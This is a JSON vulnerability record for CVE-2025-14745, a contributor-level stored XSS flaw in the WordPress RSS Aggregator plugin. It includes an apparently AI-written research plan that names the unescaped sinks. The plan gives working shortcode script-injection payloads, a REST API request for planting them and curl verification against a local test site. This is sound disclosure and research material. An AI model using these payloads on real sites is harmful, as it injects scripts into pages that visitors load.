[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuUGtztULluh2X3ctYPU4jf70StpRhmmEkZbJ2ca-ENg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2025-14745","rss-aggregator-rss-import-news-feeds-feed-to-post-and-autoblogging-authenticated-contributor-stored-cross-site-scripting","RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging \u003C= 5.0.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via wp-rss-aggregator Shortcode","The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-rss-aggregator' shortcode in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-rss-aggregator",null,"\u003C=5.0.10","5.0.11","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-22 17:08:48","2026-01-23 05:29:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdd201949-d3a1-4fdb-bf98-252fbfd59380?source=api-prod",1,[22,23,24,25,26,27,28,29],"core\u002Fmodules\u002Frenderer.php","core\u002Fsrc\u002FDisplay\u002FLayoutTrait.php","core\u002Fsrc\u002FDisplay\u002FListLayout.php","core\u002Fsrc\u002FIrPost\u002FIrImage.php","core\u002Fsrc\u002FRenderer.php","core\u002Fsrc\u002FV4\u002FV4SourceMigrator.php","languages\u002Fwp-rss-aggregator.pot","readme.txt","researched",false,3,"This plan outlines the steps to demonstrate a Stored Cross-Site Scripting (XSS) vulnerability in the **RSS Aggregator** plugin (\u003C= 5.0.10). The vulnerability allows a Contributor-level user to inject arbitrary JavaScript via unescaped shortcode attributes.\n\n### 1. Vulnerability Summary\nThe `wp-rss-aggregator` shortcode processes various attributes that define the appearance of the feed display. These attributes are mapped to a `DisplaySettings` object. When rendering the feed using the `ListLayout` or `LayoutTrait`, several settings (such as `htmlClass`, `datePrefix`, `sourcePrefix`, and `authorPrefix`) are concatenated directly into HTML strings (often using PHP Heredoc syntax) without being passed through WordPress escaping functions like `esc_attr()` or `esc_html()`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: WordPress Post Editor (Gutenberg or Classic).\n*   **Shortcode**: `[wp-rss-aggregator]`\n*   **Vulnerable Attributes**: `html_class`, `date_prefix`, `source_prefix`, `author_prefix`.\n*   **Authentication Level**: Authenticated (Contributor+). Contributors can create posts and insert shortcodes.\n*   **Preconditions**: At least one Feed Source and one Feed Item should exist to trigger the rendering of the item-specific prefixes (like `date_prefix`), although `html_class` is rendered in the outer container even if the list is empty.\n\n### 3. Code Flow\n1.  **Entry Point**: A user views a page containing the shortcode: `[wp-rss-aggregator html_class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n2.  **Processing**: The shortcode handler calls `RebelCode\\Aggregator\\Core\\Renderer::renderArgs($args, 'shortcode')`.\n3.  **Argument Parsing**: `Renderer::parseArgs` processes the `$args` array. While the provided source snippet is truncated, the logic for shortcodes typically maps `$args` (e.g., `html_class`) to the `DisplaySettings` object properties (e.g., `htmlClass`).\n4.  **Display Logic**: `Renderer::renderDisplay` is called, which initializes the layout (e.g., `RebelCode\\Aggregator\\Core\\Display\\ListLayout`).\n5.  **Vulnerable Sink (Outer Container)**: In `core\u002Fsrc\u002FDisplay\u002FListLayout.php`, the `render()` method uses `$this->ds->htmlClass` directly:\n    ```php\n    return \u003C\u003C\u003CHTML\n        \u003Cdiv class=\"wp-rss-aggregator wpra-list-template {$this->ds->htmlClass}\">\n            ...\n        \u003C\u002Fdiv>\n    HTML;\n    ```\n6.  **Vulnerable Sink (Item Meta)**: In `core\u002Fsrc\u002FDisplay\u002FLayoutTrait.php`, methods like `renderDate()` use prefixes directly:\n    ```php\n    return \u003C\u003C\u003CHTML\n        \u003C{$tag} class=\"{$class}\">\n            {$this->ds->datePrefix} {$dateStr}\n        \u003C\u002F{$tag}>\n    HTML;\n    ```\n\n### 4. Nonce Acquisition Strategy\n**No nonce is required** for this exploit.\nShortcodes are processed by WordPress whenever a page is rendered. The \"storage\" of the XSS occurs when a Contributor saves a post containing the malicious shortcode. WordPress core handles the permission for a Contributor to save posts.\n\n### 5. Test Data Setup\nTo ensure the `LayoutTrait` sinks are hit (which require items to be rendered), we will create a dummy feed source and a dummy feed item.\n\n1.  **Create a Feed Source**:\n    ```bash\n    wp post create --post_type=wprss_feed --post_title=\"Exploit Source\" --post_status=publish\n    ```\n2.  **Create a Feed Item** (associated with the source):\n    ```bash\n    # Get the ID of the source created above\n    SOURCE_ID=$(wp post list --post_type=wprss_feed --format=ids)\n    wp post create --post_type=wprss_feed_item --post_title=\"Exploit Item\" --post_status=publish --post_meta_input=\"{\\\"wprss_feed_id\\\":\\\"$SOURCE_ID\\\"}\"\n    ```\n\n### 6. Exploitation Strategy\n\n#### Step 1: Login as Contributor\nUse the `http_request` tool to authenticate as a user with the `contributor` role.\n\n#### Step 2: Create Malicious Post\nCreate a new post containing the `wp-rss-aggregator` shortcode with the payload in the `html_class` attribute. This attribute is highly reliable because it breaks out of the `class` attribute of the container `div`.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fjson`\n*   **Payload**:\n    ```json\n    {\n      \"title\": \"Aggregator Feed\",\n      \"content\": \"[wp-rss-aggregator html_class='\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']\",\n      \"status\": \"publish\"\n    }\n    ```\n    *(Note: If the REST API is restricted, use `browser_navigate` and `browser_click` to create the post via the UI).*\n\n#### Step 3: Trigger the XSS\nNavigate to the newly created post as any user (including unauthenticated visitors).\n\n*   **Action**: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002F?p=POST_ID\")`\n*   **Detection**: Look for the script execution or the broken HTML structure in the DOM.\n\n### 7. Expected Results\nThe output HTML will look like this:\n```html\n\u003Cdiv class=\"wp-rss-aggregator wpra-list-template \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">\n    \u003Cul class=\"rss-aggregator wpra-item-list ...\">\n        ...\n    \u003C\u002Ful>\n\u003C\u002Fdiv>\n```\nThe browser will execute the injected `\u003Cscript>` tag.\n\n### 8. Verification Steps\n1.  **Check Post Content**:\n    ```bash\n    wp post list --post_type=post --field=post_content\n    ```\n2.  **Verify Rendered Output**:\n    Use `http_request` to fetch the post and check if the unescaped payload exists:\n    ```bash\n    # Expected grep match\n    curl -s http:\u002F\u002Flocalhost:8080\u002F?p=POST_ID | grep -F '\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'\n    ```\n\n### 9. Alternative Approaches\nIf `html_class` is sanitized by a different component, target the meta prefixes in `LayoutTrait.php`:\n\n*   **Author Prefix**: `[wp-rss-aggregator author_prefix='\u003Cscript>alert(\"author\")\u003C\u002Fscript>']`\n*   **Date Prefix**: `[wp-rss-aggregator date_prefix='\u003Cscript>alert(\"date\")\u003C\u002Fscript>']`\n*   **Source Prefix**: `[wp-rss-aggregator source_prefix='\u003Cscript>alert(\"source\")\u003C\u002Fscript>']`\n\nThese require that at least one feed item is present and the corresponding display setting (e.g., `enable_dates`) is active. If the display settings are not active by default, they can also be enabled via shortcode attributes (e.g., `[wp-rss-aggregator date_prefix='...' dates='on']`).","gemini-3-flash-preview","2026-05-05 02:26:17","2026-05-05 02:26:46",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","5.0.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags"]